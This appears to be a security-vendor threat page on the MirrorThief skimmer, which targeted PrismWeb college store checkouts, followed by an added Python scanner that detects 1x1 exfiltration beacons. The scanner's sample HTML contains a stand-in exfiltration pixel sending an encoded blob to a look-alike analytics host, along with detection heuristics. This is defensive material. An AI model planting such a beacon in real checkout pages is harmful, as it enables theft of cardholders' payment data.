MirrorThief Card Skimmer

MirrorThief Card Skimmer Description

Card-skimming operations are nothing new in the world of cybercrime. Criminals have been carrying out such attacks for years, collecting credit card information and then selling it on the Deep Web or on various hacking sites. Recently, it was reported that a total of 201 US and Canadian college online stores had fallen victim to a card-skimming attack.

Previously, a very similar operation had been carried out by a hacking group called Magecart. However, on inspection, this new threat did not fit that profile, and experts concluded that it must be the creation of a newly emerging hacking group, which they named MirrorThief. The MirrorThief Card Skimmer hides in the JavaScript at the checkout of the infiltrated websites. It appears that the attackers built their threat to target PrismWeb-based payment pages specifically, PrismWeb being the e-commerce platform used by campus stores. This is rather unusual: cybercriminals do not normally limit their options, and card skimmers are typically built to infect multiple platforms rather than just one. The MirrorThief Card Skimmer collects all the sensitive data it can get its hands on: credit card numbers, verification numbers, card type, expiry date, the name of the holder, as well as their address and phone number.

The MirrorThief Card Skimmer manages to stay under the radar by mimicking the Google Analytics service. The attackers even went as far as to register a domain for their threat that closely resembles the legitimate Google Analytics domain.

The skimmed payment details are stored in a JSON file. To protect the file, the attackers apply AES encryption and base64 encoding before beginning the transfer. The skimmer's code then creates an HTML image tag on the compromised page whose URL points to the attacker's server, with the encrypted JSON data appended as additional query parameters. The image tag itself loads a 1-pixel image, so it is impossible to notice without taking a very close look at the page's source code.
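The exfiltration pattern described above leaves a recognisable trace in the page: an off-site, 1x1 image whose query string carries a long base64-looking blob, often on a host imitating Google Analytics. The following scanner, an added example written for this page and not code from the original article or from any vendor, takes captured checkout-page HTML and reports such beacons. The allowlist `ALLOWED_HOSTS`, the sample HTML, the look-alike host name and the base64 payload are all constructed for illustration; the real MirrorThief domain is not reproduced here.

```python
"""Scan captured checkout-page HTML for 1x1 image beacons that carry an
encoded payload to an off-site host (the MirrorThief exfiltration pattern).
Added example for this article, not the skimmer's or any project's code."""
import base64
import binascii
import re
from html.parser import HTMLParser
from urllib.parse import parse_qs, urlparse

# Hosts the store legitimately loads images or beacons from (assumed allowlist).
ALLOWED_HOSTS = {"www.google-analytics.com", "shop.example.edu"}


def looks_base64(value, min_len=32):
    """True if value is long and decodes cleanly as (url-safe or standard) base64."""
    if len(value) < min_len or not re.fullmatch(r"[A-Za-z0-9+/=_-]+", value):
        return False
    padded = value.replace("-", "+").replace("_", "/")
    padded += "=" * (-len(padded) % 4)
    try:
        base64.b64decode(padded, validate=True)
    except (binascii.Error, ValueError):
        return False
    return True


def imitates_analytics(host):
    """True if a non-allowlisted host borrows the Google Analytics name."""
    return host not in ALLOWED_HOSTS and ("analytics" in host or "google" in host)


def is_pixel(attrs):
    """True if the <img> is sized 1x1 via attributes or inline style."""
    width = attrs.get("width", "").strip("px ")
    height = attrs.get("height", "").strip("px ")
    style = attrs.get("style", "").replace(" ", "")
    if width == "1" and height == "1":
        return True
    return "width:1px" in style and "height:1px" in style


class ImgCollector(HTMLParser):
    """Collects the attribute dictionaries of every <img> tag in the document."""

    def __init__(self):
        super().__init__()
        self.imgs = []

    def handle_starttag(self, tag, attrs):
        if tag == "img":
            self.imgs.append({k: (v or "") for k, v in attrs})


def find_suspicious_pixels(html, allowed_hosts=ALLOWED_HOSTS):
    """Return one finding per off-site 1x1 image, with the reasons it was flagged."""
    parser = ImgCollector()
    parser.feed(html)
    findings = []
    for attrs in parser.imgs:
        if not is_pixel(attrs):
            continue
        url = urlparse(attrs.get("src", ""))
        host = url.hostname or ""          # relative src -> no host -> first-party
        if not host or host in allowed_hosts:
            continue
        reasons = ["1x1 image to off-site host"]
        if imitates_analytics(host):
            reasons.append("host name imitates Google Analytics")
        for name, values in parse_qs(url.query).items():
            if any(looks_base64(v) for v in values):
                reasons.append(f"base64-like payload in parameter '{name}'")
        findings.append({"host": host, "src": attrs.get("src", ""), "reasons": reasons})
    return findings


# Constructed sample page: a genuine analytics beacon, a look-alike exfiltration
# pixel carrying a base64 blob (here just an encoded placeholder string), and a logo.
SAMPLE_HTML = """
<html><body>
<img src="https://www.google-analytics.com/collect?v=1&t=pageview" width="1" height="1">
<img src="https://google-analytics-lookalike.example/collect?d=QUVTX0NJUEhFUlRFWFRfUExBQ0VIT0xERVI=" style="width:1px; height:1px">
<img src="/static/logo.png" width="200" height="60">
</body></html>
"""

if __name__ == "__main__":
    for finding in find_suspicious_pixels(SAMPLE_HTML):
        print(finding["host"], "->", "; ".join(finding["reasons"]))
```

Run against the constructed sample, only the look-alike host is reported, with all three reasons attached. A scanner like this belongs in a periodic crawl of the live checkout page (the injected tag is only visible in the rendered DOM, so compare against the deployed template rather than the repository), and the same allowlist can be enforced in the browser with a Content-Security-Policy `img-src` directive, which makes the beacon request itself fail rather than merely flagging it afterwards.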

These attacks are not uncommon, and online stores need to keep up with current cybersecurity practice to ensure the safety of their customers, as that safety is entirely their responsibility.